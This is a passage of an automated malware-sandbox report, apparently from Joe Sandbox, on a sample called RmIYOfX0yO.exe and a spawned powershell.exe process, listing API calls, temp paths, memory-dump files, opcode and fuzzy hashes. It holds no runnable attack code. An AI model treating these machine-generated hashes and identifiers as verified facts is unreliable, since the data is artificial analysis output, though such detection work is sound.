CharNextW.USER32(00000000), ref: 00405BF5
CharNextW.USER32(00000000), ref: 00405C0D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CharNext
String ID: Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3213498283-4064111799
Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9

Function 00405B37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B47
lstrcatW.KERNEL32(?,0040A014), ref: 00405B59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B37

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-1881609536
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD

Function 004038DA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 004038EC
CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 00403900

Strings

C:\Users\user\AppData\Local\Temp\nsp7359.tmp, xrefs: 00403910
C:\Users\user\AppData\Local\Temp\, xrefs: 004038DF

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsp7359.tmp
API String ID: 2962429428-2659438096
Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99

Function 00405256 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405285
CallWindowProcW.USER32(?,?,?,?), ref: 004052D6

Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Strings

, xrefs: 00405266

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RmIYOfX0yO.exe,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405B89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RmIYOfX0yO.exe,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405B99

Strings

C:\Users\user\Desktop, xrefs: 00405B83

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-4267323751
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8

Function 00405CBD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68

Analysis Process: powershell.exePID: 7472, Parent PID: 7380COMMON

Executed Functions

Function 071CC6A6 Relevance: 64.3, Strings: 50, Instructions: 1844COMMON

Download Yara Rule

Strings

x.mk, xrefs: 071CC5C1
(f|l, xrefs: 071CDDF6
tLnk, xrefs: 071CDACA
4'lq, xrefs: 071CDB51
4yl, xrefs: 071CD9A4
(f|l, xrefs: 071CCE48
(f|l, xrefs: 071CCB76
x.mk, xrefs: 071CE085
tLnk, xrefs: 071CC0C1
(f|l, xrefs: 071CD1CD
(f|l, xrefs: 071CE1F4
(f|l, xrefs: 071CDA64
(f|l, xrefs: 071CDA7A
(f|l, xrefs: 071CDC6C
-mk, xrefs: 071CC60F
tLnk, xrefs: 071CBFCB
(f|l, xrefs: 071CCAAE
(f|l, xrefs: 071CDF7E
4'lq, xrefs: 071CC2EA
(f|l, xrefs: 071CDE0C
(f|l, xrefs: 071CD137
(f|l, xrefs: 071CBFEB
4yl, xrefs: 071CD9BA
(f|l, xrefs: 071CCDAD
4'lq, xrefs: 071CC38E
tLnk, xrefs: 071CC6D3
(f|l, xrefs: 071CC899
tLnk, xrefs: 071CC760
(f|l, xrefs: 071CDF68
(f|l, xrefs: 071CCA40
(f|l, xrefs: 071CD228
(f|l, xrefs: 071CC4DD
(f|l, xrefs: 071CC0E1
(f|l, xrefs: 071CC780
(f|l, xrefs: 071CD96C
(f|l, xrefs: 071CCCC0
-mk, xrefs: 071CD3ED
(f|l, xrefs: 071CC927
x.mk, xrefs: 071CD39C
(f|l, xrefs: 071CDC5C
4'lq, xrefs: 071CD080
(f|l, xrefs: 071CE1DE
(f|l, xrefs: 071CCEA6
(f|l, xrefs: 071CC1B1
(f|l, xrefs: 071CCD11
(f|l, xrefs: 071CCB0D
(f|l, xrefs: 071CC477
tLnk, xrefs: 071CCB54
(f|l, xrefs: 071CD956
4'lq, xrefs: 071CD08C

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$4'lq$4'lq$4yl$4yl$tLnk$tLnk$tLnk$tLnk$tLnk$tLnk$x.mk$x.mk$x.mk$-mk$-mk
API String ID: 0-4077585473
Opcode ID: bb2b636c670dc8efd49d2e4480942d6666686329b5b932a2a5c95521b4bf3d90
Instruction ID: e586be4bda5ef6f495f0bd4e49b3e9fa6a58ea5524d35356c2b4a97fc97c5703
Opcode Fuzzy Hash: bb2b636c670dc8efd49d2e4480942d6666686329b5b932a2a5c95521b4bf3d90
Instruction Fuzzy Hash: E80361F4B00215DFDB24DF68C951BAAB7B2AF95304F1084A9D909AB785CB31ED81CF52

Function 0087F520 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_87d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eabf83def32958cc2c05de90ddd6f0590389bb03b00838c655e8484874fef26f
Instruction ID: d398ec948221348d25e77e2180b718798d22c3a29d0801c6198f881fe6fb1259
Opcode Fuzzy Hash: eabf83def32958cc2c05de90ddd6f0590389bb03b00838c655e8484874fef26f
Instruction Fuzzy Hash: DA21E075504204DFCF05CF14D9C0B26BFA5FB88318F24C5A9EA0D8A25AC336D856CB61

Function 071CD486 Relevance: 43.7, Strings: 34, Instructions: 1234COMMON

Download Yara Rule

Strings

(f|l, xrefs: 071CCDAD
4'lq, xrefs: 071CC38E
x.mk, xrefs: 071CC5C1
(f|l, xrefs: 071CD861
tLnk, xrefs: 071CD83D
(f|l, xrefs: 071CCA40
(f|l, xrefs: 071CD228
(f|l, xrefs: 071CD4E9
(f|l, xrefs: 071CCE48
(f|l, xrefs: 071CC4DD
(f|l, xrefs: 071CC0E1
(f|l, xrefs: 071CCB76
(f|l, xrefs: 071CD7F3
tLnk, xrefs: 071CC0C1
(f|l, xrefs: 071CD1CD
(f|l, xrefs: 071CD5DC
(f|l, xrefs: 071CCCC0
-mk, xrefs: 071CD3ED
(f|l, xrefs: 071CD589
-mk, xrefs: 071CC60F
(f|l, xrefs: 071CCAAE
tLnk, xrefs: 071CBFCB
x.mk, xrefs: 071CD39C
4'lq, xrefs: 071CD080
4'lq, xrefs: 071CC2EA
(f|l, xrefs: 071CCEA6
(f|l, xrefs: 071CC1B1
(f|l, xrefs: 071CCD11
(f|l, xrefs: 071CCB0D
(f|l, xrefs: 071CD137
(f|l, xrefs: 071CC477
tLnk, xrefs: 071CCB54
(f|l, xrefs: 071CD792
(f|l, xrefs: 071CBFEB

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$tLnk$tLnk$tLnk$tLnk$x.mk$x.mk$-mk$-mk
API String ID: 0-2443095176
Opcode ID: 3fcc7c3165f839ce3ca7de880a840f2630bc5ec084680309ccb24a64e57c22fc
Instruction ID: ec34d9643b2ec68492e687c2bbed5fd17761b7cfca442ab5c157e973add0ab54
Opcode Fuzzy Hash: 3fcc7c3165f839ce3ca7de880a840f2630bc5ec084680309ccb24a64e57c22fc
Instruction Fuzzy Hash: BAC272F4B002159FDB24DF68C950BAAB7B3AF95304F1085A9D9096B781CB35ED81CF92

Function 071C6390 Relevance: 38.7, Strings: 30, Instructions: 1178COMMON

Download Yara Rule

Strings

4'lq, xrefs: 071C7132
(f|l, xrefs: 071C6966
(f|l, xrefs: 071C6E2C
(f|l, xrefs: 071C6B04
tPlq, xrefs: 071C6674
4'lq, xrefs: 071C64E9
4'lq, xrefs: 071C7B87
(f|l, xrefs: 071C72BB
(f|l, xrefs: 071C71EB
(f|l, xrefs: 071C6B6F
(f|l, xrefs: 071C68A3
4'lq, xrefs: 071C64F5
(f|l, xrefs: 071C7310
(f|l, xrefs: 071C695C
tPlq, xrefs: 071C6680
(f|l, xrefs: 071C6D3A
tLnk, xrefs: 071C6BBA
(f|l, xrefs: 071C6D92
(f|l, xrefs: 071C6ED2
4'lq, xrefs: 071C713E
(f|l, xrefs: 071C6BE6
(f|l, xrefs: 071C6F2E
(f|l, xrefs: 071C6A9A
4'lq, xrefs: 071C7B93
(f|l, xrefs: 071C8450
(f|l, xrefs: 071C8446
(f|l, xrefs: 071C68AD
x.mk, xrefs: 071C745C
(f|l, xrefs: 071C71E1
-mk, xrefs: 071C74AD

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$4'lq$4'lq$4'lq$tLnk$tPlq$tPlq$x.mk$-mk
API String ID: 0-2553782639
Opcode ID: a31c8232f817acfc20e9ee79b357582fed9e625156ee16be60a2eca1890d453f
Instruction ID: 9561d9a281ec9bf8808edde5ba1a2369880aa2adb1c09bf6c75405397d785501
Opcode Fuzzy Hash: a31c8232f817acfc20e9ee79b357582fed9e625156ee16be60a2eca1890d453f
Instruction Fuzzy Hash: 13A2B4B4B00215DFC724DFA8C951B6AB7B2AB94304F10C5ADD50AAB785CB71ED81CF92

Function 071C754A Relevance: 33.4, Strings: 26, Instructions: 890COMMON

Download Yara Rule

Strings

4'lq, xrefs: 071C7132
(f|l, xrefs: 071C7890
(f|l, xrefs: 071C6E2C
(f|l, xrefs: 071C6B04
(f|l, xrefs: 071C72BB
(f|l, xrefs: 071C789E
(f|l, xrefs: 071C6B6F
(f|l, xrefs: 071C7979
(f|l, xrefs: 071C7310
(f|l, xrefs: 071C6D3A
tLnk, xrefs: 071C6BBA
(f|l, xrefs: 071C78EE
(f|l, xrefs: 071C6D92
(f|l, xrefs: 071C6ED2
tLnk, xrefs: 071C79C3
(f|l, xrefs: 071C6BE6
(f|l, xrefs: 071C76A5
(f|l, xrefs: 071C764B
(f|l, xrefs: 071C6F2E
(f|l, xrefs: 071C6A9A
x.mk, xrefs: 071C745C
(f|l, xrefs: 071C71E1
(f|l, xrefs: 071C7983
-mk, xrefs: 071C74AD
(f|l, xrefs: 071C75A7
(f|l, xrefs: 071C78FA

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$tLnk$tLnk$x.mk$-mk
API String ID: 0-847426991
Opcode ID: 105a38e5bb61d068931448896cd591c3a9b13d84b170e3cf93718e7b598346ef
Instruction ID: 5b9640e30f27cdfe24ac0dc4d162316dcfe774952d72435f57eda88ebbf41d22
Opcode Fuzzy Hash: 105a38e5bb61d068931448896cd591c3a9b13d84b170e3cf93718e7b598346ef
Instruction Fuzzy Hash: 838283B4B00215DFD724DFA4C951BAAB7B3AB94304F10C5ADD90A6B781CB71AD81CF92

Function 08F21288 Relevance: 21.9, Strings: 17, Instructions: 678COMMON

Download Yara Rule

Strings

$lq, xrefs: 08F2132E
$lq, xrefs: 08F216C8
$lq, xrefs: 08F21690
4'lq, xrefs: 08F215AA
(f|l, xrefs: 08F219D3
$lq, xrefs: 08F216F3
$lq, xrefs: 08F216E7
(f|l, xrefs: 08F219C9
4'lq, xrefs: 08F213BD
4'lq, xrefs: 08F213C9
tPlq, xrefs: 08F2172C
$lq, xrefs: 08F216AC
$lq, xrefs: 08F2135F
$lq, xrefs: 08F2134F
4'lq, xrefs: 08F215B6
tPlq, xrefs: 08F21738
$lq, xrefs: 08F216D4

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$4'lq$4'lq$4'lq$4'lq$tPlq$tPlq$$lq$$lq$$lq$$lq$$lq$$lq$$lq$$lq$$lq
API String ID: 0-3744569988
Opcode ID: 8a395f82c50cf960fc73b1e69ad636c452de9ab98c110815a122017a91bcd16b
Instruction ID: aad93dc4dd68ad1fa5aeca3edd279f39964007a3cf99a57d9a2692d4fd0903a1
Opcode Fuzzy Hash: 8a395f82c50cf960fc73b1e69ad636c452de9ab98c110815a122017a91bcd16b
Instruction Fuzzy Hash: 0732D375B00215DFDB14CF78C540AAABBB2EF85311F2880AED8059B355DB31ED85CBA5

Function 071C7715 Relevance: 20.6, Strings: 16, Instructions: 648COMMON

Download Yara Rule

Strings

4'lq, xrefs: 071C7132
(f|l, xrefs: 071C6E2C
(f|l, xrefs: 071C6BE6
(f|l, xrefs: 071C6B04
(f|l, xrefs: 071C6F2E
(f|l, xrefs: 071C72BB
(f|l, xrefs: 071C6A9A
(f|l, xrefs: 071C6B6F
(f|l, xrefs: 071C7310
x.mk, xrefs: 071C745C
(f|l, xrefs: 071C71E1
(f|l, xrefs: 071C6D3A
tLnk, xrefs: 071C6BBA
-mk, xrefs: 071C74AD
(f|l, xrefs: 071C6D92
(f|l, xrefs: 071C6ED2

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$tLnk$x.mk$-mk
API String ID: 0-683407794
Opcode ID: c34045534f8ff27c7e899e72a94268864fd4b7df9c2ac863fcb4ff7be92e3693
Instruction ID: 200323639cda1698050f3bb837f69fb054cbc35a1e44b6a043da4f8e4c345169
Opcode Fuzzy Hash: c34045534f8ff27c7e899e72a94268864fd4b7df9c2ac863fcb4ff7be92e3693
Instruction Fuzzy Hash: 04526FB4A00215DFD724DF98C951BAAB7B3EB94304F10C5ADD90A6B781CB71AD81CF92

Function 071CD64A Relevance: 20.6, Strings: 16, Instructions: 624COMMON

Download Yara Rule

Strings

(f|l, xrefs: 071CCCC0
(f|l, xrefs: 071CCDAD
-mk, xrefs: 071CD3ED
(f|l, xrefs: 071CCAAE
x.mk, xrefs: 071CD39C
(f|l, xrefs: 071CCA40
4'lq, xrefs: 071CD080
(f|l, xrefs: 071CD228
(f|l, xrefs: 071CCE48
(f|l, xrefs: 071CCEA6
(f|l, xrefs: 071CCB76
(f|l, xrefs: 071CD1CD
(f|l, xrefs: 071CCD11
(f|l, xrefs: 071CCB0D
(f|l, xrefs: 071CD137
tLnk, xrefs: 071CCB54

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$(f|l$4'lq$tLnk$x.mk$-mk
API String ID: 0-683407794
Opcode ID: 6a6d99c1e3e711fd47f668dee806863a2deaa615300cc264eac9dd53e2b32446
Instruction ID: e84da66040a9ffe13caf095dc0bdb6bf6b7bf36935a332273a12c8a708c5fb1f
Opcode Fuzzy Hash: 6a6d99c1e3e711fd47f668dee806863a2deaa615300cc264eac9dd53e2b32446
